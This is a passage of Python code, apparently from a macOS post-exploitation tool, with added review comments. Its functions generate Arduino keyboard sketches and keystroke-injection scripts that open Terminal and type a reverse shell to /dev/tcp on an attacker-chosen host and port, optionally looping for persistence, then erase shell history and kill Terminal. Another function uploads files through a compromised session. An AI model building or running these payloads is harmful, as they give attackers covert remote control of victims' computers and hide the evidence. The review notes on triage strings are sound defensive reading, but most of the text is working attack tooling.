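        # Narrower than a bare except, so Ctrl-C still interrupts.
        h.info_error("Failed to take picture!")
        return

    h.info_general("Saving to "+target+"...")
    time.sleep(1)
    h.info_success("Saved to "+target+"!")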
def run(self, server):
    """Prompt for options and write an Arduino keyboard sketch to disk.

    Asks for a shell name, whether the command should loop, and an output
    path. The written sketch uses Keyboard.h to press GUI+space, type
    "terminal", and then type a command redirecting the chosen shell to
    /dev/tcp/<server.host>/<server.port>, followed by
    "history -wc;killall Terminal".

    Review note: the typed command sits in the sketch as a string literal
    inside Keyboard.print(F(...)), so it can be read straight from a
    recovered .ino file.
    """
    # Every path through the body ends in break, so this loop runs once.
    while 1:
        shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
        persistence = raw_input(h.info_question_raw("Make Persistent? (y/n): ")).strip(" ").lower()
        if persistence == "y":
            # Looping form: retries every 5 seconds in the background.
            shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1); sleep 5; done & "
            break
        else:
            shell_command = shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1;"
            break
    shell_command += "history -wc;killall Terminal"
    path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
    # Work relative to the directory recorded in OLDPWD; raises KeyError when
    # that variable is not set.
    w = os.environ['OLDPWD']
    os.chdir(w)
    if os.path.isdir(path):
        if os.path.exists(path):
            # NOTE(review): path[:-1] is the path minus its last character,
            # so this is not a trailing-slash test; other generators on this
            # page compare path[-1] instead.
            if path[:-1] == "/":
                payload_save_path = path + "payload.ino"
            else:
                payload_save_path = path + "/payload.ino"
        else:
            h.info_error("Local directory: " + path + ": does not exist!")
            # NOTE(review): bare `exit` is an expression, not a call; nothing
            # stops here and payload_save_path is left unbound.
            exit
    else:
        direct = os.path.split(path)[0]
        # NOTE(review): a bare file name gives direct == "", which fails the
        # exists() test below; sibling generators fall back to ".".
        if os.path.exists(direct):
            if os.path.isdir(direct):
                payload_save_path = path
            else:
                h.info_error("Error: " + direct + ": not a directory!")
                # NOTE(review): same no-op `exit` as above.
                exit
        else:
            h.info_error("Local directory: " + direct + ": does not exist!")
            # NOTE(review): same no-op `exit` as above.
            exit
    # Literal kept exactly as it appears on the page; its original line breaks
    # were lost in extraction. shell_command is inserted into a C string
    # literal without escaping.
    payload = """\ #include "Keyboard.h" void typeKey(uint8_t key) { Keyboard.press(key); delay(50); Keyboard.release(key); } void setup() { Keyboard.begin(); delay(500); Keyboard.press(KEY_LEFT_GUI); Keyboard.press(' '); Keyboard.releaseAll(); delay(500); Keyboard.print(F("terminal")); delay(500); typeKey(KEY_RETURN); delay(500); Keyboard.print(F(\"""" + shell_command + """\")); delay(500); typeKey(KEY_RETURN); Keyboard.end(); } void loop() {}"""
    h.info_general("Saving to " + payload_save_path + "...")
    # NOTE(review): the handle is not closed if write() raises.
    f = open(payload_save_path, "w")
    f.write(payload)
    f.close()
    h.info_success("Saved to " + payload_save_path + "!")
    # Return to the tool's own directory under HOME.
    g = os.environ['HOME']
    os.chdir(g + "/mouse")
def run(self,server):
    """Prompt for options and write a keystroke-injection script to disk.

    Asks for a shell name (default "sh"), whether the command should loop,
    and an output path (default "payload.txt"). The written text is a
    sequence of DELAY/COMMAND/STRING/ENTER directives that opens "terminal"
    and types a command redirecting the chosen shell to
    /dev/tcp/<server.host>/<server.port>, followed by
    "history -wc;killall Terminal". On a bad output path it waits for Enter,
    creates an empty ".nopayload" file and returns.

    Review note: the typed command is fully visible in the generated file, so
    the /dev/tcp redirect and the history/Terminal clean-up are the strings to
    look for when triaging a recovered script.
    """
    # Every path through the body ends in break, so this loop runs once.
    while 1:
        shell = input(h.info_general_raw("Target shell: ")).strip(" ")
        if shell == "":
            shell = "sh"
        persistence = input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
        if persistence == "y":
            # Looping form: retries every 5 seconds in the background.
            shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
            break
        else:
            shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
            break
    shell_command += "history -wc;killall Terminal"
    path = input(h.info_general_raw("Output path: ")).strip(" ")
    if path == "":
        path = "payload.txt"
    # Work relative to the directory recorded in OLDPWD; raises KeyError when
    # that variable is not set.
    w = os.environ['OLDPWD']
    os.chdir(w)
    if os.path.isdir(path):
        # isdir() already implies existence, so the else branch of this test
        # is not expected to run.
        if os.path.exists(path):
            if path[-1] == "/":
                payload_save_path = path + "payload.txt"
            else:
                payload_save_path = path + "/payload.txt"
        else:
            # NOTE(review): `dest` is not defined in this function; reaching
            # this line would raise NameError. `path` looks intended.
            h.info_error("Local directory: "+dest+": does not exist!")
            g = os.environ['HOME']
            os.chdir(g + "/mouse")
            input("Press enter to continue...").strip(" ")
            # Marker file created in the current directory on failure.
            os.system("touch .nopayload")
            return
    else:
        direct = os.path.split(path)[0]
        # A bare file name has no directory part; check the current directory.
        if direct == "":
            direct = "."
        else:
            pass
        if os.path.exists(direct):
            if os.path.isdir(direct):
                payload_save_path = path
            else:
                h.info_error("Error: "+direct+": not a directory!")
                g = os.environ['HOME']
                os.chdir(g + "/mouse")
                input("Press enter to continue...").strip(" ")
                os.system("touch .nopayload")
                return
        else:
            h.info_error("Local directory: "+direct+": does not exist!")
            g = os.environ['HOME']
            os.chdir(g + "/mouse")
            input("Press enter to continue...").strip(" ")
            os.system("touch .nopayload")
            return
    h.info_general("Creating payload...")
    # Literal kept exactly as it appears on the page; its original line breaks
    # were lost in extraction.
    payload = """\ DELAY 500 COMMAND SPACE DELAY 500 STRING terminal DELAY 500 ENTER DELAY 500 STRING """+shell_command+""" DELAY 500 ENTER DELAY 500"""
    h.info_general("Saving to " + payload_save_path + "...")
    # NOTE(review): the handle is not closed if write() raises.
    f = open(payload_save_path,"w")
    f.write(payload)
    f.close()
    h.info_success("Saved to " + payload_save_path + "!")
    # Return to the tool's own directory under HOME.
    g = os.environ['HOME']
    os.chdir(g + "/mouse")
def run(self, session, cmd_data):
    """Upload a local file through the session after checking both ends.

    ``cmd_data['args']`` must hold exactly two paths, "<local_path>
    <remote_path>", separated by a space that is not preceded by a backslash.
    The local path must be an existing non-directory. The remote path is
    probed with a directory test and ``stat``: when it is a directory the
    file keeps its local name inside it, otherwise its parent directory is
    checked and the last component is used as the remote file name.

    NOTE(review): the page lost the original indentation; the nesting below
    is reconstructed from the order of the if/else keywords.
    """
    if not cmd_data['args']:
        print self.usage
        return
    else:
        # Negative look-behind keeps backslash-escaped spaces inside one path.
        paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
    if len(paths) < 2:
        print "Usage: upload <local_path> <remote_path>"
        return
    if len(paths) > 2:
        print "Usage: upload <local_path> <remote_path>"
        return
    # local_dir is computed but not used below.
    local_dir = os.path.split(paths[0])[0]
    local_file = os.path.split(paths[0])[1]
    remote_dir = os.path.split(paths[1])[0]
    remote_file = os.path.split(paths[1])[1]
    if os.path.exists(paths[0]):
        if os.path.isdir(paths[0]):
            h.info_error("Error: " + paths[0] + ": not a file!")
            return
        else:
            pass
    else:
        h.info_error("Local file: " + paths[0] + ": does not exist!")
        return
    raw = paths[1]
    # Shell snippet kept exactly as it appears on the page (its line breaks
    # were lost). NOTE(review): the remote path is inserted unquoted.
    payload = """if [[ -d """ + raw + """ ]] then echo 0 fi"""
    dchk = session.send_command({"cmd": "", "args": payload})
    chk = session.send_command({"cmd": "stat", "args": raw})
    # "0\n" from the snippet means the remote path is a directory.
    if dchk == "0\n":
        # A reply starting with "stat" is treated as "remote path not found".
        if chk[:4] != "stat":
            h.info_general("Uploading " + local_file + "...")
            session.upload_file(paths[0], raw, local_file)
            if raw[-1:] == "/":
                h.info_general("Saving to " + raw + "" + local_file + "...")
                time.sleep(1)
                h.info_success("Saved to " + raw + "" + local_file + "...")
            else:
                h.info_general("Saving to " + raw + "/" + local_file + "...")
                time.sleep(1)
                h.info_success("Saved to " + raw + "/" + local_file + "...")
        else:
            h.info_error("Remote directory: " + raw + ": does not exist!")
    else:
        # Not a directory: the parent of the remote path must exist.
        # NOTE(review): remote_dir is "" for a bare remote file name - confirm
        # how the stat command handles an empty argument.
        schk = session.send_command({"cmd": "stat", "args": remote_dir})
        if schk[:4] != "stat":
            h.info_general("Uploading " + local_file + "...")
            session.upload_file(paths[0], remote_dir, remote_file)
            h.info_general("Saving to " + raw + "...")
            time.sleep(1)
            h.info_success("Saved to " + raw + "...")
        else:
            h.info_error("Remote directory: " + remote_dir + ": does not exist!")
def run(self, server):
    """Prompt for options and write an Arduino keyboard sketch to disk.

    Asks for a shell name (default "sh"), whether the command should loop,
    and an output path (default "payload.ino"). The written sketch uses
    Keyboard.h to press GUI+space, type "terminal", and then type a command
    redirecting the chosen shell to /dev/tcp/<server.host>/<server.port>,
    followed by "history -wc;killall Terminal". On a bad output path it waits
    for Enter, creates an empty ".nopayload" file and returns.

    Review note: the typed command sits in the sketch as a string literal
    inside Keyboard.print(F(...)), so it can be read straight from a
    recovered .ino file.
    """
    # Every path through the body ends in break, so this loop runs once.
    while 1:
        shell = input(h.info_general_raw("Target shell: ")).strip(" ")
        if shell == "":
            shell = "sh"
        persistence = input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
        if persistence == "y":
            # Looping form: retries every 5 seconds in the background.
            shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1); sleep 5; done & "
            break
        else:
            shell_command = shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1;"
            break
    shell_command += "history -wc;killall Terminal"
    path = input(h.info_general_raw("Output path: ")).strip(" ")
    if path == "":
        path = "payload.ino"
    if os.path.isdir(path):
        # isdir() already implies existence, so the else branch of this test
        # is not expected to run.
        if os.path.exists(path):
            if path[-1] == "/":
                payload_save_path = path + "payload.ino"
            else:
                payload_save_path = path + "/payload.ino"
        else:
            h.info_error("Local directory: " + path + ": does not exist!")
            input("Press enter to continue...").strip(" ")
            # Marker file created in the current directory on failure.
            os.system("touch .nopayload")
            return
    else:
        direct = os.path.split(path)[0]
        # A bare file name has no directory part; check the current directory.
        if direct == "":
            direct = "."
        else:
            pass
        if os.path.exists(direct):
            if os.path.isdir(direct):
                payload_save_path = path
            else:
                h.info_error("Error: " + direct + ": not a directory!")
                input("Press enter to continue...").strip(" ")
                os.system("touch .nopayload")
                return
        else:
            h.info_error("Local directory: " + direct + ": does not exist!")
            input("Press enter to continue...").strip(" ")
            os.system("touch .nopayload")
            return
    h.info_general("Creating payload...")
    # Literal kept exactly as it appears on the page; its original line breaks
    # were lost in extraction. shell_command is inserted into a C string
    # literal without escaping.
    payload = """\ #include "Keyboard.h" void typeKey(uint8_t key) { Keyboard.press(key); delay(50); Keyboard.release(key); } void setup() { Keyboard.begin(); delay(500); Keyboard.press(KEY_LEFT_GUI); Keyboard.press(' '); Keyboard.releaseAll(); delay(500); Keyboard.print(F("terminal")); delay(500); typeKey(KEY_RETURN); delay(500); Keyboard.print(F(\"""" + shell_command + """\")); delay(500); typeKey(KEY_RETURN); Keyboard.end(); } void loop() {}"""
    h.info_general("Saving to " + payload_save_path + "...")
    # NOTE(review): the handle is not closed if write() raises.
    f = open(payload_save_path, "w")
    f.write(payload)
    f.close()
    h.info_success("Saved to " + payload_save_path + "!")